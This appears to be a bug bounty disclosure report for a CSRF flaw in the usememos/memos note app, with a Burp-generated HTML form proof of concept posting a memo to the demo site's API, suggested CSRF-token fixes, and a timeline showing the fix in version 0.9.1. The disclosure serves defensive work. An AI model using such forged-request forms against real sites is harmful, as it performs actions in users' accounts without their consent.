Add any thoughts via CSRF in usememos/memos

Valid

Reported on

Dec 28th 2022


Description

An attacker can add any user thoughts via a CSRF attack

When you send a link to the victim and click on it, any thoughts will be added

Proof of Concept

1- When the attacker adds any thoughts, it then intercepts the request

2- Take this request to generate a CSRF PoC

<html>

  <!-- CSRF PoC - generated by Burp Suite Professional -->

  <body>

  <script>history.pushState('', '', '/')</script>

    <form action="https://demo.usememos.com/api/memo" method="POST" enctype="text/plain">

      <input type="hidden" name="&#123;&quot;content&quot;&#58;&quot;Test&#32;CSRF&quot;&#44;&quot;visibility&quot;&#58;&quot;PRIVATE&quot;&#44;&quot;resourceIdList&quot;&#58;&#91;&#93;&#125;" value="" />

      <input type="submit" value="Submit request" />

    </form>

  </body>

</html>

POC

https://drive.google.com/file/d/11Hec1H-61UpoOLVi55uWRpLBUMLVjRbi/view?usp=share_link

Some sources fix CSRF

Add CSRF Token

https://www.freecodecamp.org/news/csrf-protection-problem-and-how-to-fix-it

https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html

Impact

An attacker can add any user thoughts via a CSRF attack

We are processing your report and will contact the usememos/memos team within 24 hours. 12 days ago
STEVEN validated this vulnerability 11 days ago
samirwaleed has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
STEVEN marked this as fixed in 0.9.1 with commit c9bb2b 11 days ago
STEVEN has been awarded the fix bounty
This vulnerability has been assigned a CVE
STEVEN published this vulnerability 11 days ago
to join this conversation